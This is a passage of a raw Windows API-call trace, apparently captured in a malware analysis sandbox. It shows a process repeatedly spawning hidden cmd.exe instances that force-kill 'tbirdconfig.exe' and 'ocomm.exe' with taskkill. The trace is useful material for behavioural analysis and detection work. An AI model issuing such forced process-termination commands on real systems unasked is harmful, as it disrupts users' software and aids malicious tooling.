CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.945] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12446f08 | out: lpFileInformation=0x12446f08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.945] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.945] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12446f58 | out: lpFileInformation=0x12446f58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.945] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.945] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12446fa8 | out: lpFileInformation=0x12446fa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0181.945] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0181.945] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123bba00, nSize=0x64 | out: lpBuffer="") returned 0x63 [0181.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446ff8 | out: lpFileInformation=0x12446ff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0181.946] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bbad0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0181.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447048 | out: lpFileInformation=0x12447048*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0181.946] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0181.946] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0181.946] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0181.946] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0181.946] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.946] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0181.946] GetEnvironmentStringsW () returned 0x8ea900* [0181.947] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0181.947] GetCurrentProcess () returned 0xffffffff [0181.947] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448ea0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448ea0*=0x158) returned 1 [0181.947] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448ea4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448ea4*=0x130) returned 1 [0181.947] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448ea8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448ea8*=0x13c) returned 1 [0181.947] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im tbirdconfig.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12462a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im tbirdconfig.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x144, hThread=0x140, dwProcessId=0xfa0, dwThreadId=0xef4)) returned 1 [0181.994] CloseHandle (hObject=0x140) returned 1 [0181.994] CloseHandle (hObject=0x13c) returned 1 [0181.994] CloseHandle (hObject=0x130) returned 1 [0181.995] CloseHandle (hObject=0x158) returned 1 [0181.995] CloseHandle (hObject=0x154) returned 1 [0181.995] CloseHandle (hObject=0x134) returned 1 [0181.995] CloseHandle (hObject=0x138) returned 1 [0181.995] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0183.835] SetEvent (hEvent=0x150) returned 1 [0183.835] GetExitCodeProcess (in: hProcess=0x144, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0183.835] GetProcessTimes (in: hProcess=0x144, lpCreationTime=0x1245c780, lpExitTime=0x1245c788, lpKernelTime=0x1245c790, lpUserTime=0x1245c798 | out: lpCreationTime=0x1245c780, lpExitTime=0x1245c788, lpKernelTime=0x1245c790, lpUserTime=0x1245c798) returned 1 [0183.835] CloseHandle (hObject=0x144) returned 1 [0183.836] SetEvent (hEvent=0x128) returned 1 [0183.836] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0183.843] SetEvent (hEvent=0x150) returned 1 [0183.843] SetEvent (hEvent=0x128) returned 1 [0183.843] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9930, nSize=0x64 | out: lpBuffer="") returned 0x35 [0183.843] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450be8 | out: lpFileInformation=0x12450be8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.843] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.843] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12450c38 | out: lpFileInformation=0x12450c38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.843] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.844] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450c88 | out: lpFileInformation=0x12450c88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.844] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.844] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12450cd8 | out: lpFileInformation=0x12450cd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.844] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.844] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12450d28 | out: lpFileInformation=0x12450d28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.844] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.844] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12450d78 | out: lpFileInformation=0x12450d78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.844] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.844] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12450dc8 | out: lpFileInformation=0x12450dc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.844] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.844] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12450e18 | out: lpFileInformation=0x12450e18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.844] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.845] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12450e68 | out: lpFileInformation=0x12450e68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.845] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.845] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12450eb8 | out: lpFileInformation=0x12450eb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.845] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.845] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12450f08 | out: lpFileInformation=0x12450f08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.845] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.845] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12450f58 | out: lpFileInformation=0x12450f58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.845] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0183.845] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e9a00, nSize=0x64 | out: lpBuffer="") returned 0x63 [0183.845] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450fa8 | out: lpFileInformation=0x12450fa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0183.845] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9ad0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0183.845] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450ff8 | out: lpFileInformation=0x12450ff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0183.846] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0183.846] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0183.846] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0183.846] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0183.846] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0183.846] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0183.846] GetEnvironmentStringsW () returned 0x8ea900* [0183.854] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0183.854] GetCurrentProcess () returned 0xffffffff [0183.854] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456db0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456db0*=0x154) returned 1 [0183.854] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456db4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456db4*=0x158) returned 1 [0183.854] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456db8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456db8*=0x130) returned 1 [0183.855] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im ocomm.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x1246ea80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im ocomm.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x140, hThread=0x13c, dwProcessId=0x13f4, dwThreadId=0xeec)) returned 1 [0183.949] SetEvent (hEvent=0x150) returned 1 [0183.949] CloseHandle (hObject=0x13c) returned 1 [0183.949] CloseHandle (hObject=0x130) returned 1 [0183.949] CloseHandle (hObject=0x158) returned 1 [0183.949] CloseHandle (hObject=0x154) returned 1 [0183.949] CloseHandle (hObject=0x144) returned 1 [0183.949] CloseHandle (hObject=0x138) returned 1 [0183.949] CloseHandle (hObject=0x134) returned 1 [0183.949] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xffffffff) returned 0x0 [0186.669] SetEvent (hEvent=0x150) returned 1 [0186.669] GetExitCodeProcess (in: hProcess=0x140, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0186.669] GetProcessTimes (in: hProcess=0x140, lpCreationTime=0x12466720, lpExitTime=0x12466728, lpKernelTime=0x12466730, lpUserTime=0x12466738 | out: lpCreationTime=0x12466720, lpExitTime=0x12466728, lpKernelTime=0x12466730, lpUserTime=0x12466738) returned 1 [0186.669] CloseHandle (hObject=0x140) returned 1 [0186.670] SetEvent (hEvent=0x128) returned 1 [0186.670] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0186.680] SetEvent (hEvent=0x150) returned 1 [0186.680] SetEvent (hEvent=0x128) returned 1 [0186.680] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bbba0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0186.681] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447098 | out: lpFileInformation=0x12447098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.681] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.681] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124470e8 | out: lpFileInformation=0x124470e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.681] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.682] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447138 | out: lpFileInformation=0x12447138*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.682] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.682] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12447188 | out: lpFileInformation=0x12447188*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 